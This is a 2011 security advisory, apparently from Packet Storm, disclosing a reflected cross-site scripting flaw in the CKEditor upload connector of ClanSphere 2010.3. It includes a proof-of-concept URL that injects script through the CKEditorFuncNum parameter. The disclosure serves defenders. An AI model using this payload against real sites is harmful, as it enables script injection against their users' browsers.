ClanSphere 2010.3 / CKEditor Cross Site Scripting

2011-03-24T00:00:00
ID PACKETSTORM:99698
Type packetstorm
Reporter AutoSec Tools
Modified 2011-03-24T00:00:00

Description

                                        
                                            `------------------------------------------------------------------------  
Software................ClanSphere 2010.3 / CKEditor  
Vulnerability...........Reflected Cross-site Scripting  
Threat Level............Low (1/5)  
Download................http://www.csphere.eu/  
Vendor Contact Date.....3/10/2011  
Disclosure Date.........3/24/2011  
Tested On...............Windows Vista + XAMPP  
------------------------------------------------------------------------  
Author..................AutoSec Tools  
Site....................http://www.autosectools.com/  
Email...................John Leitch <john@autosectools.com>  
------------------------------------------------------------------------  
  
  
--Description--  
  
A reflected cross-site scripting vulnerability in ClanSphere 2010.3 /  
CKEditor can be exploited to execute arbitrary JavaScript.  
  
  
--PoC--  
  
http://localhost/clansphere_2010_3/mods/ckeditor/filemanager/connectors/php/upload.php?CKEditorFuncNum=%3C/script%3E%3Cscript%3Ealert(0)%3C/script%3E  
`